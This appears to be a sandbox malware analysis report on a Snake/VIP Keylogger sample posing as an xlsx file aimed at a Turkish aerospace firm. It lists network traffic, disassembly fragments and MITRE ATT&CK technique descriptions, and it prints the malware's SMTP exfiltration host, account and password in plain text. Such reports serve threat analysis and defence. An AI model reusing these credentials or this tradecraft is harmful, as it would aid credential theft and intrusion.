Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Virustotal: Detection: 29%			Perma Link
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	ReversingLabs: Detection: 36%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D4F8E9h	2_2_00D4F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D4FD41h	2_2_00D4FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EE501h	2_2_050EE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050ED7F9h	2_2_050ED550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E31E0h	2_2_050E2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E31E0h	2_2_050E2DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050ECF49h	2_2_050ECCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EF209h	2_2_050EEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EE0A9h	2_2_050EDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_050E0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EE959h	2_2_050EE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E31E0h	2_2_050E310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E2C19h	2_2_050E2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EDC51h	2_2_050ED9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EFAB9h	2_2_050EF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_050E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_050E0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050ED3A1h	2_2_050ED0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EEDB1h	2_2_050EEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E0D0Dh	2_2_050E0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050E1697h	2_2_050E0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 050EF661h	2_2_050EF3B8

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Roca

C:\Users\user\AppData\Local\Temp\aut2654.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Function 001842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 001C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00182CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 001C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0018344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00182B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00183170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 001B8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 018A0D98 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00182C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 018A0B88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
fileCOMMON

Function 001F2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 00183B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre